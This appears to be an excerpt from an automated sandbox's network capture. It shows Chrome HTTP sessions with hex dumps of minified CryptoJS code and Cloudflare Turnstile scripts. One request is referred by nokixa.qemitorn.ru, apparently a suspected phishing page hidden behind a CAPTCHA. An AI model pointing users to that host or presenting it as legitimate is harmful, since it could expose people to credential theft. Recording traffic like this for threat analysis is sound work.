                                                                                                        2025-01-09 16:18:33 UTC1369INData Raw: 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30 3f
                                                                                                        Data Ascii: r t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0?
                                                                                                        2025-01-09 16:18:33 UTC1369INData Raw: 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d 3e
                                                                                                        Data Ascii: r(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]>
                                                                                                        2025-01-09 16:18:33 UTC1369INData Raw: 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e
                                                                                                        Data Ascii: t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:fun
                                                                                                        2025-01-09 16:18:33 UTC1369INData Raw: 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52
                                                                                                        Data Ascii: rAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQR
                                                                                                        2025-01-09 16:18:33 UTC1369INData Raw: 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 2e
                                                                                                        Data Ascii: sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this.
                                                                                                        2025-01-09 16:18:33 UTC1369INData Raw: 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35
                                                                                                        Data Ascii: m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[5


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        19192.168.2.1749750104.18.95.414431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:18:34 UTC383OUTGET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2025-01-09 16:18:34 UTC471INHTTP/1.1 200 OK
                                                                                                        Date: Thu, 09 Jan 2025 16:18:34 GMT
                                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                                        Content-Length: 47521
                                                                                                        Connection: close
                                                                                                        accept-ranges: bytes
                                                                                                        last-modified: Thu, 02 Jan 2025 13:52:36 GMT
                                                                                                        cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                        access-control-allow-origin: *
                                                                                                        cross-origin-resource-policy: cross-origin
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8ff5be738eb48c11-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2025-01-09 16:18:34 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                        Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                                        2025-01-09 16:18:34 UTC1369INData Raw: 74 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 6a 74 28 65 2c 72 29 7b 76 61 72 20 6e 3d 65 3d 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 3b 69 66 28 6e 21 3d 6e 75 6c 6c 29 7b 76 61 72 20 6f 3d 5b 5d 2c 63 3d 21 30 2c 75 3d 21 31 2c 67 2c 68 3b 74 72 79 7b 66 6f 72 28 6e 3d 6e 2e 63 61 6c 6c 28 65 29 3b 21 28 63 3d 28 67 3d 6e 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 6f 2e 70 75 73 68 28 67 2e 76 61 6c 75 65 29 2c 21 28 72 26 26 6f 2e 6c 65 6e 67 74 68 3d 3d 3d 72 29 29 3b 63 3d 21 30 29
                                                                                                        Data Ascii: t(e){if(Array.isArray(e))return e}function jt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0)
                                                                                                        2025-01-09 16:18:34 UTC1369INData Raw: 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 70 29 7b 69 66 28 6f 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 67 26 26 28 67 3d 30 2c 70 5b 30 5d 26 26 28 6e 3d 30 29 29 2c 6e 3b 29 74 72 79 7b 69 66 28 6f 3d 31 2c 63 26 26 28 75 3d 70 5b 30 5d 26 32 3f 63 2e 72 65 74 75 72 6e 3a 70 5b 30 5d 3f 63 2e 74 68 72 6f 77 7c 7c 28 28 75 3d 63 2e 72 65 74 75 72 6e 29 26 26 75 2e 63 61 6c 6c 28 63 29 2c 30 29 3a 63 2e 6e 65 78 74 29 26 26 21 28 75 3d 75 2e 63 61 6c 6c 28 63 2c 70 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 75 3b 73 77 69 74 63 68 28 63 3d 30 2c 75 26 26 28 70 3d 5b 70 5b 30 5d 26 32 2c 75 2e 76 61 6c
                                                                                                        Data Ascii: ])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.val
                                                                                                        2025-01-09 16:18:34 UTC1369INData Raw: 29 29 3b 76 61 72 20 50 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 2c 65 2e 4c 49 47 48 54 3d 22 6c 69 67 68 74 22 2c 65 2e 44 41 52 4b 3d 22 64 61 72 6b 22 7d 29 28 50 65 7c 7c 28 50 65 3d 7b 7d 29 29 3b 76 61 72 20 49 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 56 45 52 49 46 59 49 4e 47 3d 22 76 65 72 69 66 79 69 6e 67 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 76 65 72 69 66 79 69 6e 67 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 4f 56 45 52 52 55 4e 3d 22 76 65 72 69 66 79 69 6e 67 2d 6f 76 65 72 72 75 6e 22 2c 65 2e 46 41 49 4c 55 52 45 5f 57 4f 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 66 61 69
                                                                                                        Data Ascii: ));var Pe;(function(e){e.AUTO="auto",e.LIGHT="light",e.DARK="dark"})(Pe||(Pe={}));var Ie;(function(e){e.VERIFYING="verifying",e.VERIFYING_HAVING_TROUBLES="verifying-having-troubles",e.VERIFYING_OVERRUN="verifying-overrun",e.FAILURE_WO_HAVING_TROUBLES="fai
                                                                                                        2025-01-09 16:18:34 UTC1369INData Raw: 4f 4d 3d 22 63 75 73 74 6f 6d 22 7d 29 28 57 65 7c 7c 28 57 65 3d 7b 7d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 4d 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 65 2e 69 6e 64 65 78 4f 66 28 72 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 75 74 6f 22 2c 22 64 61 72 6b 22 2c 22 6c 69 67 68 74 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 75 74 6f 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 63 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3e 30 26 26 65 3c 39 65 35 7d 66 75 6e 63 74 69 6f 6e 20 75 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3e 30 26 26 65 3c 33 36 65 34 7d 76 61 72 20 49 72 3d 2f 5e 5b 30 2d 39 41 2d 5a 61 2d 7a 5f 2d 5d 7b 33 2c
                                                                                                        Data Ascii: OM="custom"})(We||(We={}));function M(e,r){return e.indexOf(r)!==-1}function it(e){return M(["auto","dark","light"],e)}function ot(e){return M(["auto","never"],e)}function ct(e){return e>0&&e<9e5}function ut(e){return e>0&&e<36e4}var Ir=/^[0-9A-Za-z_-]{3,
                                                                                                        2025-01-09 16:18:34 UTC1369INData Raw: 2c 65 72 3d 22 2e 67 2d 72 65 63 61 70 74 63 68 61 22 2c 68 74 3d 22 63 66 5f 63 68 61 6c 6c 65 6e 67 65 5f 72 65 73 70 6f 6e 73 65 22 2c 5f 74 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 2c 62 74 3d 22 67 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 22 2c 74 72 3d 38 65 33 2c 45 74 3d 22 70 72 69 76 61 74 65 2d 74 6f 6b 65 6e 22 2c 72 72 3d 33 2c 6e 72 3d 35 30 30 2c 61 72 3d 35 30 30 2c 59 3d 22 22 3b 76 61 72 20 4e 72 3d 5b 22 62 67 2d 62 67 22 2c 22 64 61 2d 64 6b 22 2c 22 64 65 2d 64 65 22 2c 22 65 6c 2d 67 72 22 2c 22 6a 61 2d 6a 70 22 2c 22 6d 73 2d 6d 79 22 2c 22 72 75 2d 72 75 22 2c 22 73 6b 2d 73 6b 22 2c 22 73 6c 2d 73 69 22 2c 22 73 72 2d 62 61 22 2c 22 74 6c 2d 70 68 22 2c 22 75 6b 2d 75 61 22 5d 2c 6b
                                                                                                        Data Ascii: ,er=".g-recaptcha",ht="cf_challenge_response",_t="cf-turnstile-response",bt="g-recaptcha-response",tr=8e3,Et="private-token",rr=3,nr=500,ar=500,Y="";var Nr=["bg-bg","da-dk","de-de","el-gr","ja-jp","ms-my","ru-ru","sk-sk","sl-si","sr-ba","tl-ph","uk-ua"],k
                                                                                                        2025-01-09 16:18:34 UTC1369INData Raw: 62 6f 73 65 4c 61 6e 67 75 61 67 65 2c 6e 3d 65 2e 69 73 53 6d 61 6c 6c 65 72 46 65 65 64 62 61 63 6b 2c 6f 3d 65 2e 69 73 4d 6f 64 65 72 61 74 65 6c 79 56 65 72 62 6f 73 65 3b 72 65 74 75 72 6e 20 6e 26 26 72 3f 22 35 34 30 70 78 22 3a 6e 26 26 6f 3f 22 35 30 30 70 78 22 3a 6e 3f 22 34 38 30 70 78 22 3a 72 3f 22 36 35 30 70 78 22 3a 6f 3f 22 35 39 30 70 78 22 3a 22 35 37 30 70 78 22 7d 3b 66 75 6e 63 74 69 6f 6e 20 42 65 28 65 29 7b 69 66 28 65 3d 3d 3d 76 6f 69 64 20 30 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 65 6e 20 69 6e 69 74 69 61 6c 69 73 65 64 20 2d 20 73 75 70 65 72 28 29 20 68 61 73 6e 27 74 20 62 65 65 6e 20 63 61 6c 6c 65 64 22 29 3b 72 65 74 75 72 6e 20 65 7d
                                                                                                        Data Ascii: boseLanguage,n=e.isSmallerFeedback,o=e.isModeratelyVerbose;return n&&r?"540px":n&&o?"500px":n?"480px":r?"650px":o?"590px":"570px"};function Be(e){if(e===void 0)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return e}
                                                                                                        2025-01-09 16:18:34 UTC1369INData Raw: 30 3b 72 65 74 75 72 6e 20 71 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 63 72 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 69 66 28 74 79 70 65 6f 66 20 72 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 69 66 28 72 2e 68 61 73 28 6f 29 29 72 65 74 75 72 6e 20 72 2e 67 65 74 28 6f 29 3b 72 2e 73 65 74 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 72 65 74 75 72 6e 20 53 65 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 63 65 28 74
                                                                                                        Data Ascii: 0;return qe=function(o){if(o===null||!cr(o))return o;if(typeof o!="function")throw new TypeError("Super expression must either be null or a function");if(typeof r!="undefined"){if(r.has(o))return r.get(o);r.set(o,c)}function c(){return Se(o,arguments,ce(t
                                                                                                        2025-01-09 16:18:34 UTC1369INData Raw: 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34 33 37 37 37 29 3b 76 61 72 20 72 3d 65 2e 73 72 63 2c 6e 3d 7b 6c 6f 61 64 65 64 41 73 79 6e 63 3a 21 31 2c 70 61 72 61 6d 73 3a 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 2c 73 72 63 3a 72 7d 3b 28 65 2e 61 73 79 6e 63 7c 7c 65 2e 64 65 66 65 72 29 26 26 28 6e 2e 6c 6f 61 64 65 64 41 73 79 6e 63 3d 21 30 29 3b 76 61 72 20 6f 3d 72 2e 73 70 6c 69 74 28 22 3f 22 29 3b 72 65 74 75 72 6e 20 6f 2e 6c 65 6e 67 74 68 3e 31 26 26 28 6e 2e 70 61 72 61 6d 73 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 6f 5b 31 5d 29 29
                                                                                                        Data Ascii: uld not find Turnstile script tag, some features may not be available",43777);var r=e.src,n={loadedAsync:!1,params:new URLSearchParams,src:r};(e.async||e.defer)&&(n.loadedAsync=!0);var o=r.split("?");return o.length>1&&(n.params=new URLSearchParams(o[1]))
                                                                                                        2025-01-09 16:18:34 UTC1369INData Raw: 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 2c 45 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 52 61 64 69 75 73 3d 22 35 70 78 22 2c 45 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 70 78 22 2c 45 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 70 78 22 2c 45 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 68 69 64 64 65 6e 22 2c 45 2e 73 74 79 6c 65 2e 6d 61 72 67 69 6e 3d 22 30 70 78 20 61 75 74 6f 22 3b 76 61 72 20 53 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 3b 53 2e 69 64 3d 22 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2d 66 72 22 29 2c 53 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 68 29 2c 53 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 6c 6c 6f 77 22
                                                                                                        Data Ascii: yle.backgroundColor="#ffffff",E.style.borderRadius="5px",E.style.left="0px",E.style.top="0px",E.style.overflow="hidden",E.style.margin="0px auto";var S=document.createElement("iframe");S.id="".concat(e,"-fr"),S.setAttribute("src",h),S.setAttribute("allow"


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        20192.168.2.1749751104.18.94.414431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:18:34 UTC798OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ttb53/0x4AAAAAAA4xOIvlPDLMxVgd/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                        Sec-Fetch-Dest: iframe
                                                                                                        Referer: https://nokixa.qemitorn.ru/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2025-01-09 16:18:34 UTC1362INHTTP/1.1 200 OK
                                                                                                        Date: Thu, 09 Jan 2025 16:18:34 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Content-Length: 26636
                                                                                                        Connection: close
                                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                        content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                                        cross-origin-embedder-policy: require-corp
                                                                                                        cross-origin-opener-policy: same-origin
                                                                                                        cross-origin-resource-policy: cross-origin
                                                                                                        origin-agent-cluster: ?1
                                                                                                        accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
